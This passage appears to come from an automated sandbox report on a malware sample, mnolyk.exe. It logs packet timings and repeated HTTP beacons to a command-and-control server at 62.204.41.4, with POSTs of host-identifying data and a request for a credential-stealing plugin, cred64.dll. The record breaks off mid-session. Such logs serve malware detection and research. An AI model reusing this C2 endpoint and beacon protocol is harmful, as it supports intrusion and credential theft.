                                                                      Feb 7, 2023 23:10:28.297275066 CET805047062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.297382116 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.297772884 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.359241962 CET805047062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.361551046 CET805047062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.361676931 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.468485117 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.470855951 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.530258894 CET805047062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.530354977 CET5047080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.533632040 CET805047162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.533761024 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.534173965 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.596872091 CET805047162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.599333048 CET805047162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.599471092 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.718164921 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.718916893 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.780381918 CET805047262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.780502081 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.780920029 CET805047162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.781018019 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.781122923 CET5047180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.842305899 CET805047262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.845155001 CET805047262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:28.845257998 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.952999115 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:28.953600883 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.015202045 CET805047262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.015232086 CET805047362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.015357018 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.015360117 CET5047280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.015985966 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.077548981 CET805047362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.081521988 CET805047362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.081589937 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.205411911 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.206250906 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.267031908 CET805047362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.267220020 CET5047380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.267703056 CET805047462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.267828941 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.268969059 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.330379963 CET805047462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.332952976 CET805047462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.333046913 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.439646006 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.444730997 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.501277924 CET805047462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.503384113 CET5047480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.506246090 CET805047562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.508888960 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.511990070 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.573390961 CET805047562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.575716972 CET805047562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.577085972 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.687033892 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.687849045 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.748725891 CET805047562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.748852968 CET5047580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.749073982 CET805047662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.753123045 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.753559113 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.814680099 CET805047662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.817495108 CET805047662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.819171906 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.936057091 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.936989069 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.996253967 CET805047762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.997380972 CET805047662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:29.997665882 CET5047680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.999027014 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:29.999027967 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.058387995 CET805047762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.062169075 CET805047762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.063122034 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.171015024 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.172029018 CET5047880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.230411053 CET805047762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.231025934 CET5047780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.233484030 CET805047862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.233639956 CET5047880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.234168053 CET5047880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:10:30.295481920 CET805047862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.297786951 CET805047862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:10:30.297868013 CET5047880192.168.2.762.204.41.4
                                                                      • 62.204.41.4
                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.74969462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:00.567050934 CET8OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:00.630398035 CET9INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.74969562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:00.567383051 CET9OUTGET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                                                                      Host: 62.204.41.4
                                                                      Feb 7, 2023 23:07:00.628043890 CET9INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:00 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 162
                                                                      Connection: keep-alive
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      10192.168.2.74970462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:03.968547106 CET114OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:04.032342911 CET114INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      100192.168.2.74979562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:27.539097071 CET215OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:27.602813005 CET215INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      101192.168.2.74979662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:27.783129930 CET216OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:27.845711946 CET216INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      102192.168.2.74979762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:28.024523973 CET217OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:28.090460062 CET217INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      103192.168.2.74979862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:28.267776012 CET218OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:28.331127882 CET218INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      104192.168.2.74979962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:28.505366087 CET219OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:28.567754984 CET219INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      105192.168.2.74980062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:28.753248930 CET220OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:28.817456007 CET220INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      106192.168.2.74980162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:28.990557909 CET221OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:29.054677963 CET221INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      107192.168.2.74980262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:29.225909948 CET222OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:29.289135933 CET222INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      108192.168.2.74980362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:29.455828905 CET223OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:29.520322084 CET223INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      109192.168.2.74980462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:29.696239948 CET224OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:29.761579037 CET224INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      11192.168.2.74970562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:04.226732969 CET115OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:04.288414955 CET115INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      110192.168.2.74980562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:29.940053940 CET225OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
